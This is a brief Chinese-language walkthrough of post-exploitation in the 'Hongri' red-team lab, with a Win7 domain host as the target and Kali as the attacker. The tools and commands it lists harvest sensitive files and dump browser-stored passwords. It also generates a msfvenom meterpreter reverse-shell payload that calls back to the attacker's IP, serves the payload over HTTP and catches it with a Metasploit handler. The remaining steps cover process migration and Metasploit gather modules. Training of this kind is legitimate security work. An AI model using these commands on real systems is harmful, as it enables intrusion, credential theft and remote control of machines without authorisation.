域控:windows server 2008
域内机器:win7
攻击机:kali
就是红日靶场(一)的虚拟机。
一、配置文件敏感信息收集
使用searchall64.exe,下图在win7上用的是3.5.6,3.5.9用不了,会报错。
searchall64.exe -p c:// # 收集C盘下的敏感信息
二、浏览器密码&记录
使用hack-browser-data-windows-64bit.exe,同样这里是在win7上运行,v0.4.3可用,v0.4.5用不了。
三、MSF信息收集
1、生成反弹木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f exe -o reverse_shell.exe
2、kali开启http服务,win7下载反弹shell
python3 -m http.server 9999
3、kali开始监听(使用msf)
msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6 # 我们的kali本机ip
set lport 4444 # 我们的kali本机端口
exploit # 开始进行监听;
在win7上运行反弹shelltest.exe,即可获取win7的shell。
注入到新的进程
getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P <pid> # 迁移到相应pid的进程中
进入受害机shell
shell # 进入shell
chcp 65001 # 修改编码,解决控制台乱码问题
获取目标机器的分区信息
run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息
判断是否是虚拟机:
run post/windows/gather/checkvm # 判断是否是虚拟机
开启了什么服务:
run post/windows/gather/enum_services # 开启了什么服务
安装了什么应用
run post/windows/gather/enum_applications # 安装了什么应用
获取主机最近的系统操作
post/windows/gather/dumplinks # 获取主机最近的系统操作
查看补丁
run post/windows/gather/enum_patches #查看补丁
